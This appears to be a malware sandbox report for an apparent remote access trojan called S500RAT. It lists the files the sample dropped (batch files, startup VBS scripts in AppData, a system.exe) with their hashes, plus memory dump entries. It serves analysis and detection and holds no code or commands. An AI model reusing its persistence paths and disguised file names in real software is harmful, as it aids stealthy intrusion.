C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\S500RAT.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d51ac06ac8bc4a1947d3ebe65111139b

SHA1
ebd9dc63b944128b34e83f2e8c494bbd10d29680

SHA256
8d133eaf2d3868eb5686c6e79c5efd852e47d0f4723a16b168618d1507319e12

SHA512
d5a28fe4dd84002040cea8940925c7b7643ab63db9d97bc1f2ed144cd1588431cf55f0e9c442e2c6c624e327a08bf85ca471a80b7d74bbedd8728fb759356bc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3d641cd28f787cc00f15efd95a9e1872

SHA1
5df0b7162ba76966623c548d624991165daef6a1

SHA256
2decca7711c1f27b712f17bbb3fd8de431cb11cff6090eef8f4839b9072648d7

SHA512
ec945ba29ce19e515b7ad5f81f4a427f3b665bdecb878ed2840c738c76c4a54284dc90e11751524cee601609619b025bcd8d7c1e38f8670bfa9d0d4ba7d2247b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
708415d8e0e27642991d12a9fe342a13

SHA1
3ebdd703556dd68d7fae7ef002974f516c01fa45

SHA256
dfb46a300c0ad49f1e08b367d554c2506df80bbf9ab826f3949fbfaaffe624f7

SHA512
4059646ee2de53460f39d069ea4eb2afbbc848c463efc600d71cec06d46491ec19d7bd67136544de507d82cf093a91c2678bc7ecf83fe5b93d71ba0f8fd7b385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3b82eaa3044439c192e75b9d5f6e349d

SHA1
e7cc8d859428ee4b0e07bbc80066da9d0584d73e

SHA256
fd4ab712ee5f21cf746c2e1f337d444d01e46706357f216ddcdf01e71993a53d

SHA512
c61ab9fad369ca40d267e9b4a7119120d37d711dbbe57011261b1a6156567b9b6ff46f148034dd8bba995fa65335d19c0c0458b9be95ff82a3e0ddc4a85ea275

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b3c3db201c6e1fc54f0e17762fe03246

SHA1
249bfcef33cdd2d6c13a7cc7c9c1d73905fb51d6

SHA256
6771a83a83da5d6ce23e9cfa5567eb70084dffd51a7c07130ba3379cff78a59f

SHA512
2945c6f4e05b86e161b9753fca74cc9daf76e8ef535cdff0e9d83cca706eabd6e1ca3aba55005b2d16c2023f6604ee6886837336a63f421fa25f73120cfc00a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2978aa75d916500a2aef8ada9090ca23

SHA1
2dee099af0164f2c8feab69679f0f11fd0839a30

SHA256
cfc539e0dc127b136d9383f304aa52585b35a1cc04ef175c4d684d088c320dea

SHA512
74ddd371f1ffc01385e28abe43deca77e1811374a33fb3b19f28bca7480d9205c88efd0ea0cfa0675c8325c9dce3d0f0ad6a7ca2114ee5e6524c5d74a1913eb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0aa63dbb46d451e47a7a682c64af776d

SHA1
3b0026f2dae8e9c491ccaa40133755779de35aaa

SHA256
9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b

SHA512
4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cc5e033811a5d520bb4a6904b5c433b

SHA1
c159a342ed372790600b3a6ac97e274638a0ce9a

SHA256
9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

SHA512
dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12c844ed8342738dacc6eb0072c43257

SHA1
b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

SHA256
2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

SHA512
e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
311d8a5fc140420bdfdb5d58b840fd09

SHA1
d3d8c242515cc3d5e5a887f0a6a6464b9833f14d

SHA256
5fccea0235c1fa7aa6dd34a5cba25d8faa009602b6c715c0c16e1e9def04680f

SHA512
59bb22175c85130bfe62c8a6b8f5b44d338f758c341ac3045cc4f07fe013b1711e27724e1ce494c2fa5014a7c81830016044fecc7b6086e71af94f4df531f23a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbbf71e9fb59f80938f09809b160e441

SHA1
8b9a517d846cb9a0a284f77ed88328236a85055f

SHA256
e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

SHA512
90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
993af531f0b57e8128ec273731c3a8e2

SHA1
a42ea55876f4f390837dd2c95fb7ff2344b6e9e1

SHA256
fff934d70d813381536d272c5b8ac6ad70acd054267b13592da767c9bd1dda62

SHA512
bdf5970ff2ee314dc297fce5c0f44765e77acbf269cd9ad9e7448a391d5f80d66a0c5426f99bc3480851e8763413aa180b3b3b6b22ef0e86a365450cb8c334e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe

Filesize
18.8MB

MD5
017ab96e80048ff5c16c045f0b07dd5c

SHA1
81d29230438596bc35d5c20a3c5077c6f6bf286a

SHA256
baf65c88b4d48cb3701f9dc503f9800e06b490e169c8f3668f250052c703ee62

SHA512
8a2fb18187f6432a4c266de6dbda7b98d1838838a73dc9a593d2f814336d5842ea3ce101a60714aabc735390560b6c61e66166c0a643646c7e5aa994c59f2987

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat

Filesize
262KB

MD5
ad0c8112fc6de16730b2c05452bd5a5d

SHA1
de5c18c8b52136d3f36eb309d2cab5a94217b80f

SHA256
3ca4327561a8b88204b8716306fccf8815ba3ea515d5f213c810355fa66d19c7

SHA512
5d854c0cb895c989d06b49b7004ef2747dbbd3225f066cd84792e9c99238f03cd63b3943729a7853b00b49492d5ab0525b37999a97f23a46ce1486ede770f780

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aatydgpd.qrc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\invoicer.bat

Filesize
284KB

MD5
f4d1ac2353407590dd8f02cac6b2104a

SHA1
9681117cd8ea67bc8b3907004e9ce808ca0187ec

SHA256
3c7c299737de3ff60f8c30f000c0a9f3454396acc1dce473e1e1a2696bbc67b7

SHA512
7d4e6dbf7ea33a5a020df56e001928ef8b387b8d7eae8d26f5f591790553ab102a7186cd39ef937ab895976b504ae4a2540b7f2405a7d2ab81fbb87575da2082

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_253.vbs

Filesize
115B

MD5
2247d6bd7aa7133606ba10adc4a12439

SHA1
9a355fa865c33f247078d25144ea206ad6526662

SHA256
c8720fa0203f7570f4f7ef70ba67919f5b56afab81a9626ea510258a70571e81

SHA512
b1b154a2c861915f74468d51a35156a39e26436d9772ebd25c02abae526ab0780e19902ab72f7add8c685b5de9c0804ff03437c5eba5aaf743109dcd680d4916

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_459.vbs

Filesize
115B

MD5
e82ad39c92b02438fd3ffa24ea952fdd

SHA1
e7d447be8581a28d8bbbd4723256c42bda68ef30

SHA256
e552e5bedb451ce70c65f34a9177b6fad8c8662f7b012865cb257657dba2c2b7

SHA512
b69f3aff6d3cdbe34817e0482ff0869f9f614707ceaede151379859f32a91d1f70b5333a9a114f71a922ce48b4776ef04e25fb00c7bab5692b123a73505f27ad

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_560.vbs

Filesize
115B

MD5
ff63c0272a35c475f29a4bef883ea19b

SHA1
4dd3473d8a45ff1db62151c21221318f61b4a8de

SHA256
a91bf12406c20b0d9722aa5c443a12df16ef48ef4c3d93be69a86c99b07cb4ec

SHA512
eab5c6d5b09dae5fc637b5c3f2b04c296125120fa8927d33a540abcec9d69150076f7b101004855b13be9629564bb6c37caaee08ead003b34a029edb3f1f8892

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_656.vbs

Filesize
115B

MD5
113a821d05098ab879260216205770de

SHA1
ecddac3cf1034ea105f9952fd5b2108305fff93d

SHA256
5ded882285de8f8621e2cc25c00551f729851cdfb2322345b3f0a9769172a043

SHA512
9a2a230a8fd2e0898dbf507d0d71c4f0fad3ede29da7bcc4f84ba469e6d7ff79cbcb58bd485eabd8df56ec4afbb1f3963705c05863cbc3ebbafa8921f650b0d4

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_710.vbs

Filesize
115B

MD5
3b48f2acb7b8196347a8532383c9f92f

SHA1
06c1185f539fb24252fa52a644f37042515a53df

SHA256
7bec5bf483c2997b47974ce4435625174d3315fcc4e58f67cd953c1c103e0763

SHA512
973f77dfbe8010a5b9b6cad37dcb1dd8942a2704ef40a525bac57d3bb22266a919ea5197f01b29fea07949a58c8d7a513dccb1802de388d3d5ea92b03bb543df

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_80.vbs

Filesize
114B

MD5
ed6727914bd82e63738b7a4baecf0b48

SHA1
657c99505d822abb6de7108cb7ab51bfbf38fbb7

SHA256
7c431d1125251cb53943087030e0e65bc471ab22189f76acd1c777d1de1a3e93

SHA512
3c3066fa86be1ddc071f530688b6aabd17381e26c0634c194fabe337aef8451895636b05aab5289bb43116ff766ad003f9b6d7113c29fab5e9f684245a602f4d

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_844.vbs

Filesize
115B

MD5
be28012baa09da7dbf0ae2511ccb9e24

SHA1
8db02128ee9d8881601b77ae4c06a214764c6c6a

SHA256
9b3877401b9255dfee730c9d150a5e4f70b3528582b021847cc0972d0bb9e604

SHA512
36e041228074696ce499fd7deea59fa79b887ba515126fd00b885b5a9ff2ff4c09c3e9be7e8844632b805d11ecb962a89e28b7d9fadccbf3cca270355381eadd

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_906.vbs

Filesize
115B

MD5
a0bf48d4abaa1d177553b10bd0e30df2

SHA1
9e7d46922a7a63c0f93a7bbace3112851543a9d2

SHA256
3be15ae4f1b693b4eecdd434b25863e8571df5afdafa4fd6755d3afa7eb5c2a9

SHA512
8fcef0a7a6b6cef9896c8ddb0893cd6d8e83e36b87b405784ed75bb08bc9953a3831eaf5f7ede1602260c48367b027f78d7a0ed4576e4d0b1ae6116399eef225

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_924.vbs

Filesize
115B

MD5
6ce097e076a189b52bbdb999fc77791e

SHA1
e97ba346a2989d1f32d1d0fdbda3008797d6508e

SHA256
6a4f8c3033c62c7a8f61ccf4ed12f74703cf3ab25c7aa1fb42e6a7bf2f822eac

SHA512
8c8cdc8a80df6fc284f2b919ff83be5887e1a54c58a54161d2a9af2694b5d0afd5c62469228f91e261d33c4c838d45f06f825c2f2728c15d5d88dc0da3145ed6

Download Submit
C:\Users\Admin\system\system.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/740-219-0x0000026CAD7C0000-0x0000026CAD7CE000-memory.dmp

Filesize
56KB

Download
memory/1768-569-0x0000017871430000-0x00000178714A6000-memory.dmp

Filesize
472KB

Download
memory/1768-568-0x0000017871360000-0x00000178713A4000-memory.dmp

Filesize
272KB

Download
memory/2980-314-0x0000029979860000-0x0000029979894000-memory.dmp

Filesize
208KB

Download
memory/3440-28-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

Filesize
10.8MB

Download
memory/3440-26-0x0000022CCC7F0000-0x0000022CCC812000-memory.dmp

Filesize
136KB

Download
memory/3440-16-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

Filesize
10.8MB

Download
memory/4256-14-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

Filesize
10.8MB

Download
memory/4256-15-0x0000000000A10000-0x0000000001CDA000-memory.dmp

Filesize
18.8MB

Download
memory/4256-141-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

Filesize
10.8MB

Download
memory/4280-60-0x00000184F44F0000-0x00000184F44F8000-memory.dmp

Filesize
32KB

Download
memory/4280-71-0x00000184F4650000-0x00000184F4688000-memory.dmp

Filesize
224KB

Download
memory/4500-73-0x00000257F67D0000-0x00000257F67D8000-memory.dmp

Filesize
32KB

Download
memory/4500-92-0x00000257F6830000-0x00000257F6864000-memory.dmp

Filesize
208KB

Download
memory/4512-2-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

Filesize
10.8MB

Download
memory/4512-0-0x00007FFC5D173000-0x00007FFC5D175000-memory.dmp

Filesize
8KB

Download
memory/4512-48-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

Filesize
10.8MB

Download
memory/4512-1-0x0000000000AC0000-0x0000000001DF0000-memory.dmp

Filesize
19.2MB

Download
memory/4716-188-0x00000266EDD80000-0x00000266EDD96000-memory.dmp

Filesize
88KB

Download